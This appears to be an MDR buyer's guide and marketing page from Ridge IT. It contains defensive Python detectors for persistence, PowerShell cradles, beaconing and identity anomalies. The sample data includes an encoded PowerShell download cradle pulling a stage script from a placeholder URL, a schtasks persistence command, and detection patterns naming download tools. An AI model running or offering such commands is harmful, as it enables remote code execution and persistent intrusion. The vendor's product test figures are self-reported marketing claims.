MDR BUYER'S GUIDE

How to Choose an MDR Provider. 5 Red Flags Most Vendors Hope You Miss.

Choosing the right managed detection and response provider is a high-stakes decision — one that determines whether your security team gets real threat intelligence or just more email to read. This guide covers what to evaluate, what to ask, and how to tell the difference between a real SOC and an alert forwarding service.

By Perry Schumacher, Chief Strategy Officer, Ridge IT Cyber
TLDR: When choosing an MDR provider, evaluate five things: (1) do they triage every alert or just criticals, (2) do they investigate before notifying you or just forward alerts, (3) can they actively respond — isolate endpoints, kill processes — without waiting for your approval, (4) do they check for persistence after stopping the initial threat, and (5) do you own your licenses and data if you leave. Most providers fail on at least three of these. This guide covers the five red flags to watch for, a complete evaluation checklist of questions to ask before you sign, what a real SOC triage looks like versus alert forwarding, and how to tell the difference between managed detection and response and a filter with a monthly invoice.

WHY MDR EVALUATION MATTERS

Why Are So Many Organizations Choosing the Wrong MDR Provider?

The MDR market is projected to reach $10.43 billion by 2034, and over 62% of enterprises now use some form of managed detection service. But market growth doesn't mean quality. The barrier to calling yourself an "MDR provider" is effectively zero — and buyers who don't know what to evaluate are paying the price.

60%
Of breaches involve a human element your MDR should catch
Verizon DBIR, 2025 [1]
62%
Of enterprises use some form of managed detection service
Fortune Business Insights, 2025 [2]
87%
Of compromises take minutes or less to execute
Verizon DBIR, 2025 [1]
20%
Of breaches take months or more to discover
Verizon DBIR, 2025 [1]

UNDERSTANDING THE DIFFERENCES

MDR vs SOC vs SIEM: What's the Difference and What Do You Actually Need?

The security industry uses these three acronyms almost interchangeably, and buyers who confuse them end up paying for a tool when they needed a team, or for a team when they needed a tool. Here's what you're actually buying.

MDR (Managed Detection & Response)

A service that monitors your endpoints and network for threats, investigates alerts in real time, and responds to incidents — either immediately or under your direction. You don't own the people; you own the outcome. MDR works best when the provider has the authority and tools to respond without waiting for you to approve every action.

SOC (Security Operations Center)

A team (yours or outsourced) that monitors security events, triages alerts, and executes incident response. A SOC is the people; MDR is the service. You can have an in-house SOC or an outsourced SOC. Ridge IT's managed SOC is part of our MDR offering.

SIEM (Security Information & Event Management)

A tool (software) that ingests logs from across your environment and applies rules to detect patterns. A SIEM is just the platform. You still need people to watch it, tune it, and respond to what it finds. A SIEM without a SOC is an expensive log storage system.

What you actually need: An MDR provider with a capable SOC team backing real-time SIEM tooling. Not one of the three alone — all three working together.

5 RED FLAGS WHEN CHOOSING AN MDR PROVIDER

How to Choose an MDR Provider: What to Evaluate Before You Sign

If your "managed" security feels like it's still landing in your lap, it probably is. These are the five red flags that reveal whether an MDR provider is actually managing your detection and response — or just relabeling it.

1. They Only Triage Critical and High Alerts

Most MDR providers set a severity threshold. Anything below "high" gets logged, not investigated. But here's the problem: attackers don't announce themselves with high-severity alerts.

The alarm they trip could be the only one they trip — and they could have evaded all the others. A low-severity alert might be the single fingerprint of a sophisticated attack. Skipping it isn't efficiency. It's a gamble.

"Just because its detection is low doesn't mean it's not a threat. That alarm they tripped could be the only one they tripped — and they could have evaded all the others. We don't know that. So we act as if we don't."

2. They Forward Alerts: They Don't Investigate Them

Here's the test: when you receive a notification from your MDR provider, has a full triage already been completed? Or are they sending you the alert with a label and expecting you to determine if it's real?

If you're still deciding what's a true positive and what's noise, you don't have managed detection and response. You have a human in the middle of your alert chain doing what an email rule could do.

"Your MDR provider is basically an email forwarding chain. You just have a human forwarding you the alert instead of just automatically getting it. That's not MDR — that's a filter."

3. They Can't Actually Respond, Only "Recommend"

If your MDR provider says "active remediation" but can't isolate an endpoint without your approval, that's guided response, not active response. Real response means the SOC can isolate machines, kill malicious processes, disable compromised accounts, and execute containment playbooks without waiting for you to wake up at 2 AM and click "approve." That authority should still be bounded by rules of engagement agreed in writing before go-live: which actions the SOC may take on its own, which systems (a domain controller, a production database, plant equipment) need a phone call first, and how every action is logged so you can review it afterwards.

When minutes matter, a recommendation email is not a response.

4. They Don't Check for Persistence

Stopping the initial threat isn't enough. A real triage checks whether the attacker left anything behind: scheduled tasks, registry Run keys, startup folder modifications, new services or WMI event subscriptions, and outbound PowerShell calls to GitHub or remote management tools that fetch a second stage. If your provider resolves the alert but doesn't check for persistence, the attacker just waits for the ticket to close and picks up where they left off.

5. They Lock You Into Their Platform

Many MDR providers require you to use their proprietary SIEM, their portal, their agent. When you leave, you lose your data, your dashboards, and sometimes your licenses.

A provider that needs to lock you in to keep your business is telling you something about the quality of their service. If they treated you the way your last vendor treated you, could you fire them without it hurting your business?

"At no point, ever, do we take you out of the admin seat on any solution we manage. Your CrowdStrike tenant is yours. Your Zscaler is yours. Your Microsoft is yours. If I treat you the way your last vendor treated you, I want you to be able to fire me without it hurting your business."

WHAT REAL MDR LOOKS LIKE

What Does Ridge IT's SOC Actually Do on Every Alert?

On every alert — not just criticals, not just highs, every alert — our SOC runs a full triage playbook. Our Tier 1 and Tier 2 analysts monitor and investigate every detection. If you get a notification from us, a full investigation was already completed. Here's what that means:


Persistence Checks

Scheduled tasks, registry entries, startup folders — did the attacker leave anything behind that will survive a reboot?

PowerShell & Script Analysis

Outbound PowerShell calls to GitHub, TeamViewer, or any external tool that says "I'm downloading something": download cradles such as Invoke-WebRequest or DownloadString, Base64-encoded command lines, and scripts that pull a second stage from a code-hosting or remote-management domain. We catch living-off-the-land techniques most providers miss.


C2 Communication Detection

Command-and-control indicators — is this endpoint phoning home to an attacker? We check for beaconing patterns, DNS anomalies, and encoded outbound traffic.


Identity Behavior Analysis

Impossible travel, credential stuffing patterns, lateral movement between systems. CrowdStrike Identity Protection catches account compromise before it becomes a breach. This is foundational to Zero Trust Architecture.


Immediate Isolation & Containment

If the alert is real, we don't send you an email asking for permission. We isolate the machine, kill the process, and disable the compromised account — then we call you with the full picture.


Full Forensic Documentation

Every triage produces a documented investigation trail — what was found, what was done, what to watch for next. Your compliance team and your auditors will thank you.

This is the difference between paying for somebody to watch an alert and paying for somebody to actually respond to it. Every client. Every alert. Every time.
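As an added illustration (not Ridge IT's playbook code, which this page does not publish), the Python below runs three of the checks above over constructed endpoint telemetry for a single low-severity alert: persistence (Run keys, the Startup folder, schtasks/sc create), PowerShell download-cradle detection including decoding of a -EncodedCommand payload, and C2 beaconing by interval regularity. The telemetry, host names, thresholds and staging-host list are all assumptions made for the example.

```python
# Added example (not Ridge IT's playbook code): a minimal triage pass over
# constructed endpoint telemetry for one low-severity alert, running the
# persistence, PowerShell/script and C2-beaconing checks described above.
import base64
import re
import statistics
from datetime import datetime, timedelta

# Persistence locations (Windows): Run/RunOnce keys, Startup folder, schtasks/sc create.
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)$", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
PERSIST_CMD = re.compile(r"\b(schtasks(\.exe)?\b.*/create\b|sc(\.exe)?\s+create\b)", re.I)

# Script analysis: download cradles, -EncodedCommand payloads, staging/remote-management hosts.
CRADLE = re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|"
                    r"DownloadFile|Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_HOST = re.compile(r"https?://([^\s'\"/:]+)", re.I)
STAGING_SUFFIXES = ("github.com", "githubusercontent.com", "teamviewer.com", "anydesk.com")  # assumed list


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if none/invalid."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def check_persistence(events):
    """Anything that survives a reboot: Run keys, Startup folder writes, task/service creation."""
    findings = []
    for e in events:
        if e["type"] == "registry" and RUN_KEY.search(e["key"]):
            findings.append(f"run key {e['key']}\\{e['value']} -> {e['data']}")
        elif e["type"] == "file" and STARTUP_DIR.search(e["path"]):
            findings.append(f"startup folder write {e['path']}")
        elif e["type"] == "process" and PERSIST_CMD.search(e["cmdline"]):
            findings.append(f"persistence command: {e['cmdline']}")
    return findings


def check_scripts(events):
    """PowerShell that downloads something, including cradles hidden behind -EncodedCommand."""
    findings = []
    for e in events:
        if e["type"] != "process" or not re.search(r"powershell|pwsh", e["image"], re.I):
            continue
        script = e["cmdline"] + " " + decode_encoded_command(e["cmdline"])
        hosts = {h.lower() for h in URL_HOST.findall(script)}
        staging = sorted(h for h in hosts if h.endswith(STAGING_SUFFIXES))
        if CRADLE.search(script) or staging:
            findings.append(f"download cradle in {e['image']} -> {', '.join(staging) or 'unknown host'}")
    return findings


def check_beaconing(events, min_connections=6, max_jitter=0.15):
    """Destinations contacted at near-constant intervals; low jitter is the beacon signature."""
    by_dest = {}
    for e in events:
        if e["type"] == "network":
            by_dest.setdefault(e["dest"], []).append(datetime.fromisoformat(e["time"]))
    findings = []
    for dest, times in by_dest.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean else 1.0
        if jitter <= max_jitter:
            findings.append(f"beacon to {dest}: {len(times)} connections every ~{mean:.0f}s (jitter {jitter:.0%})")
    return findings


def triage(alert, events):
    """Full triage regardless of severity; containment follows the findings, not the label."""
    findings = {"persistence": check_persistence(events), "scripts": check_scripts(events),
                "c2": check_beaconing(events)}
    confirmed = any(findings.values())
    action = "isolate host, kill process, disable account, then brief the customer" if confirmed else "document and close"
    return {"alert": alert["name"], "severity": alert["severity"], "host": alert["host"],
            "confirmed": confirmed, "findings": findings, "action": action}


# Constructed sample telemetry (not real data): one low-severity alert on host WS-042.
_STAGE = "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/example/stage/main/p.ps1')"
_ENC = base64.b64encode(_STAGE.encode("utf-16le")).decode()
SAMPLE_ALERT = {"name": "Suspicious PowerShell command line", "severity": "low", "host": "WS-042"}
SAMPLE_EVENTS = [
    {"type": "process", "time": "2025-03-01T02:03:10", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"type": "process", "time": "2025-03-01T02:03:40", "image": "schtasks.exe",
     "cmdline": r'schtasks /create /tn Updater /tr "C:\Users\Public\u.exe" /sc minute /mo 5'},
    {"type": "registry", "time": "2025-03-01T02:03:41", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": r"C:\Users\Public\u.exe"},
    {"type": "process", "time": "2025-03-01T02:04:00", "image": "chrome.exe", "cmdline": "chrome.exe --profile-directory=Default"},
    {"type": "network", "time": "2025-03-01T02:04:05", "dest": "203.0.113.9:443"},  # one-off, benign
] + [  # eight connections to one host about every 60 s: a beacon
    {"type": "network", "time": (datetime.fromisoformat("2025-03-01T02:03:00") + timedelta(seconds=s)).isoformat(),
     "dest": "203.0.113.7:443"} for s in (60, 118, 180, 239, 300, 360, 420, 479)
]
```

The point of the structure is in triage(): containment is decided by what the checks find, never by the severity label the alert arrived with, which is exactly the behaviour red flag #1 demands. Running triage(SAMPLE_ALERT, SAMPLE_EVENTS) confirms the low-severity alert and recommends containment because the encoded command decodes to a download cradle, two persistence mechanisms were planted and one destination is contacted on a 60-second cadence. The beacon threshold (jitter under 15 percent across at least six connections) is deliberately simple; real C2 frameworks add jitter, so production logic also looks at DNS anomalies and encoded payloads, as the page's C2 item says.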

THE COMPARISON

How Does a Typical MDR Provider Compare to Ridge IT?

We hear the same story from every prospect who comes to us after a disappointing MDR experience. Here's what they had versus what they get:

Capability: Alert Triage Scope
  Typical MDR provider: critical and high alerts only
  Ridge IT Managed Security: every alert; the standard triage process runs on every alert

Capability: Investigation Depth
  Typical MDR provider: severity label, then forwarded to your team
  Ridge IT Managed Security: persistence checks, PowerShell analysis and C2 detection completed before notification

Capability: Response Capability
  Typical MDR provider: "guided response", recommendations rather than actions
  Ridge IT Managed Security: immediate isolation, process kill and account disable, with no approval wait

Capability: Identity Monitoring
  Typical MDR provider: endpoint-only visibility
  Ridge IT Managed Security: CrowdStrike Identity Protection for lateral movement, impossible travel and credential attacks

Capability: Network Visibility
  Typical MDR provider: EDR data only, no network context
  Ridge IT Managed Security: Zscaler ZIA inspects all outbound traffic for data exfiltration and C2, as part of a SASE architecture

Capability: License Ownership
  Typical MDR provider: proprietary platform; you lose data and access if you leave
  Ridge IT Managed Security: you own every license, with full admin access and no black boxes

Capability: Remote Access Security
  Typical MDR provider: not typically included
  Ridge IT Managed Security: Zscaler ZPA, Zero Trust remote access that significantly reduces lateral-spread risk

Capability: Validation
  Typical MDR provider: "trust us", with no proof of tool effectiveness
  Ridge IT Managed Security: cyber range tested; in Ridge IT's internal testing against 260 CISA threat samples, CrowdStrike took 3 months to bypass

VENDOR EVALUATION

Managed Detection and Response Provider Comparison: Questions to Ask Every Vendor

Not all MDR providers are equal. The difference between a full-triage SOC and an alert-forwarding service isn't visible in a marketing deck — it emerges during incident response when minutes matter. Use these comparative questions to separate vendors who genuinely manage your detection from those who just relay messages.

Red Flags in Vendor Responses

  ○ "We triage critical and high-severity alerts"
  ○ "We forward alerts to your team for investigation"
  ○ "You'll need to approve remediation actions"
  ○ "Our platform is our differentiator"
  ○ "We can't give you admin access to your tools"
  ○ "You'll need to use our SIEM and agents"

Green Flags in Vendor Responses

  ✓ "We investigate every alert, regardless of severity"
  ✓ "Our SOC completes full triage before notifying you"
  ✓ "We isolate endpoints and kill processes immediately"
  ✓ "You keep full admin access to all your tools"
  ✓ "You own your licenses and your data"
  ✓ "We use industry-standard tools you already know"

MDR EVALUATION CHECKLIST

What Questions Should You Ask Before Choosing an MDR Provider?

Before you sign with any MDR provider — including Ridge IT — ask these ten questions. The answers will tell you whether you're getting managed detection and response or managed alert forwarding.

1. "What alerts do you investigate — all of them, or only criticals and highs?"

Attackers don't announce themselves with high-severity alerts. If your MDR skips low-severity detections, they're gambling that the one alert the attacker tripped was a loud one.

2. "When you notify me, has a full investigation already been completed — or are you forwarding the alert for me to investigate?"

The difference between MDR and an email rule. If you're still determining what's real, you have a filter, not a managed service.

3. "Can your SOC isolate endpoints, kill processes, and disable accounts without waiting for my approval?"

This is the difference between active response and guided response. At 2 AM, a recommendation email is not a response.

4. "What persistence checks do you run after stopping the initial threat?"

Scheduled tasks, registry entries, startup folder modifications, outbound calls to remote management tools. If they don't check for persistence, the attacker just waits for the ticket to close.

5. "What happens after hours — who's on the other end of a high-severity alert at 2 AM on a Saturday?"

Ask for specifics: named roles, escalation paths, response SLAs. "We have 24/7 coverage" means nothing without the process behind it.

6. "Who owns the tools and data if I leave?"

If your CrowdStrike tenant, your Zscaler, or your SIEM data lives on their proprietary platform, you don't own it — you're renting it. Leaving means starting over.

7. "What network and identity data do you see beyond the endpoint?"

Endpoint-only visibility is a known gap. Real MDR should include network traffic analysis and identity behavior monitoring — not just what happens on the machine.

8. "What is your median time to investigate and contain a confirmed threat?"

Not mean time to detect on its own. An average hides the long tail, and detecting a threat is not an outcome if nobody contains it. Ask for the median time from alert to containment action, and for the 95th percentile, because that is where the 2 AM Saturday alert lives. If they can't answer, they're not measuring it.

9. "How have you validated the tools you deploy — did you test them, or did the vendor tell you they work?"

Most providers deploy whatever their vendor partner recommends. Ask whether they've independently tested their stack against real-world threats.

10. "Can I see a sample investigation report from a real alert triage?"

A provider confident in their process will show you what a completed investigation looks like. One that can't is telling you something about what you'd actually receive.

Ridge IT's position: We answer every one of these questions publicly because our process is the product. Our standard triage runs persistence checks, PowerShell analysis, and C2 detection on every alert. You own every license. And we'll show you sample investigation reports before you sign. Ask us these questions directly.

WE TEST EVERYTHING WE DEPLOY

How Does Ridge IT Know Their Tools Actually Work?

Most providers deploy whatever their vendor partner tells them to. We test every leading security solution in our cyber range — throwing 260 reverse-engineered CISA threats at them and measuring what gets through. That's how we decided what to deploy, and it's why we're confident in what we recommend.

Methodology: Internal Ridge IT cyber range testing conducted across 2024–2025 using 260 reverse-engineered CISA threat samples tested against leading endpoint detection solutions under controlled conditions. Results may vary by environment and threat type.

3 months
CrowdStrike Falcon
Time to bypass in our internal cyber range testing — the only solution that took more than 3 days
< 3 days
Every Other Solution
No other endpoint protection solution survived longer than 3 days under the same test conditions
260
CISA Threat Samples
Reverse-engineered from real-world CISA advisories and used to test every solution head-to-head

What This Looks Like in Practice: The SonicWall Breach Wave

During the SonicWall breach wave, Ridge IT clients with CrowdStrike Identity Protection saw the attack unfold in real time: SonicWall appliance compromised → a compromised user account starts scanning the network with Nmap → CrowdStrike disables the user → another user account is compromised → CrowdStrike disables that user.

Attack stopped. Clients without CrowdStrike Identity Protection got cryptolocked. Same attack, same vulnerability, different outcome — because the right tools were in place and someone was actually watching.

KNOW THE DIFFERENCE

What Is the Difference Between EDR, MDR, and XDR?

These three acronyms get used interchangeably, but they're fundamentally different. Understanding what you have — and what you actually need — is the first step to knowing whether your current provider is giving you what you're paying for.

EDR
Endpoint Detection & Response

A tool. Software that runs on your endpoints (laptops, servers, workstations) and detects suspicious activity. EDR is the sensor — it sees what happens on the machine. But it requires someone to watch the alerts, investigate them, and respond. If no one's doing that, you have a very expensive log generator.

XDR
Extended Detection & Response

A bigger tool. XDR extends detection beyond endpoints to include network traffic, cloud workloads, email, and identity systems. More visibility is better — but it's still a platform. It still needs humans to investigate alerts, correlate signals, and take action. More data without more analysis just means more noise.

MDR
Managed Detection & Response

A service. MDR is supposed to be the humans who run the tools — 24/7 monitoring, investigation, and response by trained security analysts. The problem is that "managed" has become a marketing label. Some MDR providers run a world-class SOC. Others just forward alerts. The acronym doesn't tell you which one you're getting.

The tool is important — which is why we deploy CrowdStrike Falcon, which in our internal testing took 3 months to bypass compared to other solutions. But the tool without the team is just noise. And the team without a real triage process is just an email forwarding chain.

FREQUENTLY ASKED QUESTIONS

Questions About MDR That Your Provider Hopes You Don't Ask

How can I tell whether my MDR provider actually investigates alerts?

Ask them one question: "On a low-severity alert that fires at 2 AM on a Saturday, what exactly does your SOC do before notifying me?" If the answer involves the words "log," "queue," or "business hours," you have a filter, not an MDR. A real managed SOC runs persistence checks, PowerShell analysis, and C2 detection on every alert regardless of severity or time of day.

What is the difference between guided response and active response?

Guided response means the provider sends you a recommendation and waits for you to act. Active response means the SOC can isolate endpoints, kill processes, and disable accounts without waiting for your approval. When an attacker is moving laterally at 2 AM, the difference between these two models is the difference between containment and a full breach. Ridge IT operates with active response capability: we act first and brief you after.

Can I keep the endpoint protection tool I already have?

You can, but we'll be honest about whether your current tool is the right one. We've tested every major endpoint solution in our cyber range. CrowdStrike took 3 months to bypass. Nothing else lasted more than 3 days. If you have an MDM, migration is an MSI: uninstall one, deploy the other. We walk your team through it end-to-end, or we handle it entirely. And if CrowdStrike isn't the right fit for some locations, we can still help with network and identity. It doesn't have to be all or nothing.

What does identity protection add on top of endpoint detection?

Most MDR providers only see endpoint data. We layer CrowdStrike Identity Protection on top of endpoint detection, which monitors every authentication event for anomalies: impossible travel, credential stuffing, lateral movement between systems. During the SonicWall breach wave, this is exactly what caught the attack: a compromised user account starts scanning the network with Nmap, CrowdStrike disables the user, another account is compromised, CrowdStrike disables that one too. Attack stopped. Learn more about our Zero Trust architecture.
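An added example, not CrowdStrike Identity Protection's logic and not code from this page: the Python below implements two of the identity behaviours named above over constructed authentication events. impossible_travel() flags consecutive logons by one account whose source geolocations imply a speed no airline reaches, and lateral_fanout() flags a single account authenticating to many distinct hosts inside a short window, the signal behind "a user starts scanning the network". User names, IP addresses, coordinates and the thresholds (900 km/h, 8 hosts in 5 minutes, 100 km minimum distance) are assumptions.

```python
# Added example (not CrowdStrike Identity Protection's logic): two identity checks
# over constructed authentication events, impossible travel and host fan-out.
import math
from collections import defaultdict
from datetime import datetime

EARTH_RADIUS_KM = 6371.0


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points given in decimal degrees, in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def _by_user(events):
    """Group events per account, sorted by ISO-8601 timestamp."""
    grouped = defaultdict(list)
    for ev in events:
        grouped[ev["user"]].append(ev)
    for evs in grouped.values():
        evs.sort(key=lambda e: e["time"])
    return grouped


def impossible_travel(logons, max_speed_kmh=900.0, min_distance_km=100.0):
    """Consecutive logons whose geolocated sources would require an impossible speed."""
    findings = []
    for user, evs in _by_user(logons).items():
        for a, b in zip(evs, evs[1:]):
            hours = (datetime.fromisoformat(b["time"]) - datetime.fromisoformat(a["time"])).total_seconds() / 3600
            km = haversine_km(a["lat"], a["lon"], b["lat"], b["lon"])
            # km > speed * hours also covers hours == 0 (two distant places at the same instant);
            # min_distance_km keeps two geolocations inside one metro area from firing.
            if km >= min_distance_km and km > max_speed_kmh * hours:
                findings.append({"user": user, "from": a["src"], "to": b["src"],
                                 "km": round(km), "hours": round(hours, 2)})
    return findings


def lateral_fanout(auths, window_minutes=5, min_hosts=8):
    """One account reaching many distinct hosts inside a short window (scan or lateral movement)."""
    findings = []
    for user, evs in _by_user(auths).items():
        times = [datetime.fromisoformat(e["time"]) for e in evs]
        best = 0
        for i, start in enumerate(times):  # sliding window anchored on each event
            hosts = {evs[j]["host"] for j in range(i, len(evs))
                     if (times[j] - start).total_seconds() <= window_minutes * 60}
            best = max(best, len(hosts))
        if best >= min_hosts:
            findings.append({"user": user, "distinct_hosts": best, "window_minutes": window_minutes})
    return findings


# Constructed sample events (not real data). Coordinates are approximate city centres.
LOGONS = [
    {"user": "alice", "time": "2025-03-01T09:00:00", "src": "198.51.100.10", "lat": 33.749, "lon": -84.388},  # Atlanta
    {"user": "alice", "time": "2025-03-01T09:40:00", "src": "203.0.113.20", "lat": 50.450, "lon": 30.523},   # Kyiv
    {"user": "bob", "time": "2025-03-01T09:00:00", "src": "198.51.100.11", "lat": 33.749, "lon": -84.388},    # Atlanta
    {"user": "bob", "time": "2025-03-01T13:00:00", "src": "198.51.100.12", "lat": 36.163, "lon": -86.782},    # Nashville
]
AUTHS = [
    {"user": "alice", "time": "2025-03-01T09:01:00", "host": "FS-01"},
    {"user": "alice", "time": "2025-03-01T09:02:00", "host": "MAIL-01"},
] + [  # svc_backup touches twelve hosts in two minutes, ten seconds apart: a scan, not a backup job
    {"user": "svc_backup", "time": f"2025-03-01T02:10:{10 * n:02d}", "host": f"HOST-{n:02d}"} for n in range(6)
] + [
    {"user": "svc_backup", "time": f"2025-03-01T02:11:{10 * n:02d}", "host": f"HOST-{n + 6:02d}"} for n in range(6)
]
```

impossible_travel(LOGONS) reports only alice (Atlanta to Kyiv, roughly 8,700 km in 40 minutes); bob's Atlanta-to-Nashville hop four hours later is ordinary travel. lateral_fanout(AUTHS) reports svc_backup with twelve distinct hosts inside the window, which is the point at which an identity-aware control disables the account rather than waiting for an endpoint alert on each host.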

How does the cost compare to building an in-house SOC?

A 24/7 in-house SOC requires a minimum of 6–8 security analysts to cover all shifts. At $100K–$150K per analyst, you're looking at $600K–$1.2M annually, before tools, training, and turnover. Ridge IT delivers managed SOC coverage with full triage on every alert at a fraction of that cost. And we sell Microsoft 365 at 10% below list price, so the savings often offset a significant portion of the security investment.

Do I keep my licenses and data if I leave Ridge IT?

Yes. Always. Your CrowdStrike tenant, your Zscaler, your Microsoft: they're yours from day one and they stay yours if you leave. We manage on MSP-specific tenants, and you always have full admin access. No black boxes. No hostage licenses. If we're not earning your business every month, you should be able to walk without losing your security infrastructure. That's how it should work. See our managed IT approach.

Is Ridge IT endpoint-only, or do you see network traffic too?

We're not endpoint-only. Zscaler ZIA gives us visibility into all outbound traffic: we see data exfiltration attempts, C2 communications, and DNS anomalies that endpoint-only providers miss entirely. CrowdStrike Identity Protection monitors authentication behavior across your environment. And Zscaler ZPA replaces VPN with Zero Trust access, removing the flat-network lateral spread that makes breaches catastrophic. The security stack works together; that's the point.

How is Ridge IT different from other MDR providers?

Three things. First, we triage every alert; most providers skip anything below high severity. Second, we don't just do endpoint. We manage the full stack: CrowdStrike for endpoints, Zscaler for network and remote access, Okta for identity, Microsoft 365 for collaboration. Third, you own everything. Arctic Wolf requires their proprietary platform. Huntress is agent-first with limited scope. We deploy industry-leading tools on your tenants and manage them end-to-end. We're the Inc. 5000 #1 ranked MSSP protecting 700+ organizations across healthcare, manufacturing, hospitality, and financial services.

RELATED SERVICES

The Full Security Stack Behind Real MDR

Managed Cybersecurity

Full triage on every alert — the Ridge IT managed security operation from the inside.


Endpoint Protection

CrowdStrike Falcon — cyber range tested. In our internal testing, 3 months to bypass vs. other solutions. Deployed and managed end-to-end.


Zero Trust Architecture

Identity-verified access that significantly reduces lateral movement risk — the architecture that stops breaches before they spread.


SASE Security

Zscaler ZIA for internet security, ZPA for remote access — outbound visibility most MDR providers don't have.


Penetration Testing

External and internal testing that proves your defenses work — not just checks a compliance box.


Security Assessment

Find out what's actually exposed before an attacker does. Documented findings your team can act on.


Sources & Methodology

  1. Verizon Data Breach Investigations Report (DBIR) 2025: Human element involvement in 60% of breaches; 87% of compromises executed in minutes or less; 20% of breaches take months or more to discover
  2. Fortune Business Insights 2025: 62% of enterprises use some form of managed detection service; MDR market projected to reach $10.43 billion by 2034
  3. Ridge IT Cyber Range Testing (2024-2025): 260 reverse-engineered CISA threats tested against leading endpoint detection solutions; CrowdStrike Falcon benchmark results
  4. Ridge IT Managed Security Data: SonicWall breach response case study (2023); SOC triage methodology; identity-based attack detection practices

READY FOR MDR THAT ACTUALLY RESPONDS?

Stop Paying for an Email Forwarding Chain

Get a security assessment from the Inc. 5000 #1 ranked MSSP — 700+ organizations, full triage on every alert, and you always own your licenses.
